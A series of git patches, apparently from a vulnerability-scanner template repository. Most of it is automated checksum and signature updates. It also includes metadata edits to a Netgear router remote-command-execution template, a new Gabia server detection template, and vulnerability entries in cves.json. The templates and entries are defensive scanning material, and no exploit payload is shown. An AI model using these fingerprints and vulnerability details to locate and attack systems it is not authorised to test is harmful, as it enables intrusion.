http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc -http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 -http/misconfiguration/installer/invoice-ninja-installer.yaml:1cc5ec76b7ec954a5a2a707c2e558ecff5f018ba -http/misconfiguration/installer/jfa-go-installer.yaml:55a1d406199affc4050e2691de8a844ed5828791 +http/misconfiguration/installer/invicti-enterprise-installer.yaml:b6dcb44bccfb0d5e8e5e93c2064366465bc7445b +http/misconfiguration/installer/invoice-ninja-installer.yaml:a47676cd18944ae6d03c57d2fb62202a052668ad +http/misconfiguration/installer/jfa-go-installer.yaml:91fbc04a3dac28f1b0607e93ad891a6b9fd0257f http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a -http/misconfiguration/installer/justfans-installer.yaml:ec7eee3a958238dc8416b8311a97218ac5dc2a23 +http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 +http/misconfiguration/installer/librenms-installer.yaml:333655623dee73fdc147ce0e6b93ff5035b30743 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f http/misconfiguration/installer/lychee-installer.yaml:62abd9489fe78e56935daee247bf8314e1bd279e @@ -5518,7 +5519,7 @@ http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcf http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f773aa565679bd65 -http/misconfiguration/installer/tastyigniter-installer.yaml:24ae629a775107fe9bcc658e1377f483f864c4a9 +http/misconfiguration/installer/tastyigniter-installer.yaml:e7cb6e7f2260190535a8d2de4b5eda98a819dafc http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 @@ -5528,7 +5529,7 @@ http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e -http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:8d8e12dccb52a4754d1c1ac579401f21a4c6913b http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 http/misconfiguration/installer/virtual-smartzone-installer.yaml:f8179584291b98fb14ac863562c3392d99276652 @@ -8597,7 +8598,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c5c5920cb3e415a9dc318b40e8843abce8dec5ce +templates-checksum.txt:5f3494f76751f8b9761a306f97ff83ba1dcda1d0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 066764a6627f571e5d98bab29de942377f039ee9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:37 +0000 Subject: [PATCH 1513/1768] Auto Generated New Template Addition List [Wed May 29 08:11:36 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8314acb106..d53ff6a0fd 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml From 6af675ecab3402e25fbf6a2fd6d9069b544af0d6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:50 +0000 Subject: [PATCH 1514/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3305d463d8..5050b10a5a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' From 051002ec78e6aca5dad8df6734dbf74ea895785c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:43:14 +0530 Subject: [PATCH 1515/1768] minor update --- http/iot/netgear-boarddataww-rce.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 56d5921e84..7609c7043a 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -1,15 +1,18 @@ id: netgear-boarddataww-rce info: - name: Netgear router boardDataWW.php - Remote Code Execution + name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution author: pussycat0x - severity: high + severity: critical description: | - There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands. reference: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: fofa-query: title=="Netgear" + verified: true + max-request: 1 tags: rce,netgear,iot http: From 036f51525defe2a84539a50c021c2acd1f8ea2d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:13:17 +0000 Subject: [PATCH 1516/1768] Auto Template Signing [Wed May 29 08:13:17 UTC 2024] :robot: --- http/exposed-panels/fortinet/fortisiem-panel.yaml | 1 + http/exposed-panels/fortinet/fortiweb-panel.yaml | 2 +- http/misconfiguration/installer/librenms-installer.yaml | 1 + http/misconfiguration/installer/snipe-it-installer.yaml | 1 + http/misconfiguration/installer/ubersmith-installer.yaml | 1 + 5 files changed, 5 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index 2bbb829426..bfa0541c28 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -32,3 +32,4 @@ http: - type: word words: - "fortiSIEM_current_login_salt" +# digest: 4b0a004830460221008a6a772c3fffde8fd5b541e366e20e6b81a4011deaf15fa077582db848d2c813022100fb2379020323dd1ef0c99d77e5087cc52deb84d65e814c6701363586ed883756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 76942ae247..38cb069229 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022041fe6af3ec8275528e99ab5d5a507ebf026da3333ded6112955b3bc8be63b5cc02202908a0bbf12ad0bcf706162700aaa732b9aeebecd13227b915076e9e53cbe495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml index 07e0c9cbf8..acc04bf806 100644 --- a/http/misconfiguration/installer/librenms-installer.yaml +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml index d3646c227e..ce1ce6709b 100644 --- a/http/misconfiguration/installer/snipe-it-installer.yaml +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ubersmith-installer.yaml b/http/misconfiguration/installer/ubersmith-installer.yaml index f8b8218812..9d749a1770 100644 --- a/http/misconfiguration/installer/ubersmith-installer.yaml +++ b/http/misconfiguration/installer/ubersmith-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022052a003d038d9b265499b84d6301697b5740af3328121ce22b33deaf522fb0f9b02202b3af6afa1ab2ccdbb7887991dc379bec0e673fb90462d403d00662d8191ded7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From edc73f5b7cc52859071f4893a3cdf919597d45de Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:16:08 +0000 Subject: [PATCH 1517/1768] Auto Generated New Template Addition List [Wed May 29 08:16:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d53ff6a0fd..742727d535 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml From 00cc12ebd85da2dd10d4f780a7aec7db00fd86f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:16:20 +0000 Subject: [PATCH 1518/1768] Auto Generated Templates Checksum [Wed May 29 08:16:20 UTC 2024] :robot: --- templates-checksum.txt | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a5ebc69c09..4718a3209a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3756,6 +3756,7 @@ http/exposed-panels/dell-wyse-login.yaml:48ff68728102023bc2877e3a7edb874644900a4 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:14f6893b5cf90d837dfcd3539276a87995114da6 http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 +http/exposed-panels/digital-watchdog-panel.yaml:8148885c57f0f158ef852b1124c85c6259077073 http/exposed-panels/digitalrebar-login.yaml:c43de0bee9718e24c9d224e8ea6df0208533f9c2 http/exposed-panels/directadmin-login-panel.yaml:82b98e41b8c2d8c8acb2133c10860bf4cee4df2c http/exposed-panels/directum-login.yaml:df68d6cb3b75935a403fa6254f29a7278619e0d7 @@ -3852,8 +3853,9 @@ http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:237d07426d4e4a893b240d http/exposed-panels/fortinet/fortinet-panel.yaml:f1798cfb14f2f54edc3d6746a402d1716659e65c http/exposed-panels/fortinet/fortios-management-panel.yaml:c7c0c4b9eed1b1a4546c3655439186718078d591 http/exposed-panels/fortinet/fortios-panel.yaml:d7766874f165089c3e1539b84d46d46984c52ae5 +http/exposed-panels/fortinet/fortisiem-panel.yaml:710ad79df9bd04ed0c736f797cde35d22263bb12 http/exposed-panels/fortinet/fortitester-login-panel.yaml:e366bffb4008cbd19a32a104d93251a042fdcbbf -http/exposed-panels/fortinet/fortiweb-panel.yaml:6893382e70ed550bd9f342d6e24e3a41ec921165 +http/exposed-panels/fortinet/fortiweb-panel.yaml:7e2b08c3cbed4015bfa950366ff8affa439ba810 http/exposed-panels/fortinet/fortiwlm-panel.yaml:3260c3235302198e0168fba0ed389bc474ddfbd5 http/exposed-panels/freeipa-panel.yaml:0068757bb30eded3c0d933ee11d417e1800a854d http/exposed-panels/freepbx-administration-panel.yaml:3c250e83cf97aa3ef95b1c881b173a79e8cc7876 @@ -5150,6 +5152,7 @@ http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 +http/iot/netgear-boarddataww-rce.yaml:6fa4f7421844e5385aac788c6f0d2d222156c8a1 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -5454,7 +5457,7 @@ http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5 http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 -http/misconfiguration/installer/librenms-installer.yaml:333655623dee73fdc147ce0e6b93ff5035b30743 +http/misconfiguration/installer/librenms-installer.yaml:918045c9f38e3d800119f1c8a2c2062a47a20509 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f http/misconfiguration/installer/lychee-installer.yaml:62abd9489fe78e56935daee247bf8314e1bd279e @@ -5511,7 +5514,7 @@ http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 -http/misconfiguration/installer/snipe-it-installer.yaml:d344b83caa3a3823c89653eee76405375aa9527b +http/misconfiguration/installer/snipe-it-installer.yaml:582748ffd95ef18e4a27db008da5629f8d209be2 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f @@ -5526,7 +5529,7 @@ http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7 http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 -http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 +http/misconfiguration/installer/ubersmith-installer.yaml:d3f99788e31b13c9717ad3ae9040abdc29ae192a http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:8d8e12dccb52a4754d1c1ac579401f21a4c6913b @@ -8598,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5f3494f76751f8b9761a306f97ff83ba1dcda1d0 +templates-checksum.txt:b2894935f81a261f0f8454fdbf5d1b55c1492e4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2b0b2afbe01708b9f749f16e6ba0d32b0bbabda6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:16:53 +0000 Subject: [PATCH 1519/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5050b10a5a..b1b12f984b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,9 +17,11 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' From 2e8532c4496bf02ab6b97c124d506ede6d607260 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:18:04 +0000 Subject: [PATCH 1520/1768] Auto Template Signing [Wed May 29 08:18:04 UTC 2024] :robot: --- http/exposed-panels/digital-watchdog-panel.yaml | 1 + http/iot/netgear-boarddataww-rce.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index a347524716..7818badec2 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -25,3 +25,4 @@ http: - type: dsl dsl: - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" +# digest: 4b0a00483046022100e849b952b0ea96f568c0746acad027fb76ea85738d9e5621a94afaa79103f005022100b9d51a990553586b7768ff6474f128f3d0e607497de83d955f6a67084e7d5c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 7609c7043a..4aabb1a762 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b6c61c87467289005949eec183a02c9dc2bff7f2f32e4157ad72a0fc2b0cd66e02200cc90f2e20e5fc9c629d08a84e24a7f02bc37a1e421341a749496f7619f14fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8f1c5f2ad20c69afd5dc2020804878c9a1da43fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 14:12:11 +0530 Subject: [PATCH 1521/1768] Create gabia-server-detect.yaml --- http/technologies/gabia-server-detect.yaml | 35 ++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/technologies/gabia-server-detect.yaml diff --git a/http/technologies/gabia-server-detect.yaml b/http/technologies/gabia-server-detect.yaml new file mode 100644 index 0000000000..e6249d5acf --- /dev/null +++ b/http/technologies/gabia-server-detect.yaml @@ -0,0 +1,35 @@ +id: gabia-server-detect + +info: + name: Gabia Server - Detection + author: jadu101 + severity: info + description: | + Detects gabia web server. + metadata: + verified: true + max-request: 1 + shodan-query: "Server: gabia" + tags: tech,gabia,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Server: gabia" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 9dd673d15d48dc763bc8fc7e1a9eba3ee4363c53 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:47:42 +0000 Subject: [PATCH 1522/1768] Auto Generated Templates Checksum [Wed May 29 08:47:42 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4718a3209a..1792f9bfa6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3756,7 +3756,7 @@ http/exposed-panels/dell-wyse-login.yaml:48ff68728102023bc2877e3a7edb874644900a4 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:14f6893b5cf90d837dfcd3539276a87995114da6 http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 -http/exposed-panels/digital-watchdog-panel.yaml:8148885c57f0f158ef852b1124c85c6259077073 +http/exposed-panels/digital-watchdog-panel.yaml:3bb409f16d3069ab7d223e27007ede75a61a655b http/exposed-panels/digitalrebar-login.yaml:c43de0bee9718e24c9d224e8ea6df0208533f9c2 http/exposed-panels/directadmin-login-panel.yaml:82b98e41b8c2d8c8acb2133c10860bf4cee4df2c http/exposed-panels/directum-login.yaml:df68d6cb3b75935a403fa6254f29a7278619e0d7 @@ -5152,7 +5152,7 @@ http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:6fa4f7421844e5385aac788c6f0d2d222156c8a1 +http/iot/netgear-boarddataww-rce.yaml:2ed1aa424c78d57f9978c72b9f3fa3d6e99b9c08 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -8601,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b2894935f81a261f0f8454fdbf5d1b55c1492e4e +templates-checksum.txt:aab4de2297091fcd9b0008bf2a1d84dcf4593c88 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7995528b411058beead9edd45311a814845e40a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:50:51 +0000 Subject: [PATCH 1523/1768] Auto Generated cves.json [Wed May 29 08:50:51 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index b5bbba72c0..7fea183947 100644 --- a/cves.json +++ b/cves.json @@ -1607,6 +1607,7 @@ {"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1439.yaml"} {"ID":"CVE-2022-1442","Info":{"Name":"WordPress Metform \u003c=2.1.3 - Information Disclosure","Severity":"high","Description":"WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1442.yaml"} {"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1574.yaml"} +{"ID":"CVE-2022-1580","Info":{"Name":"Site Offline WP Plugin \u003c 1.5.3 - Authorization Bypass","Severity":"medium","Description":"The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2022/CVE-2022-1580.yaml"} {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} @@ -1830,6 +1831,7 @@ {"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via 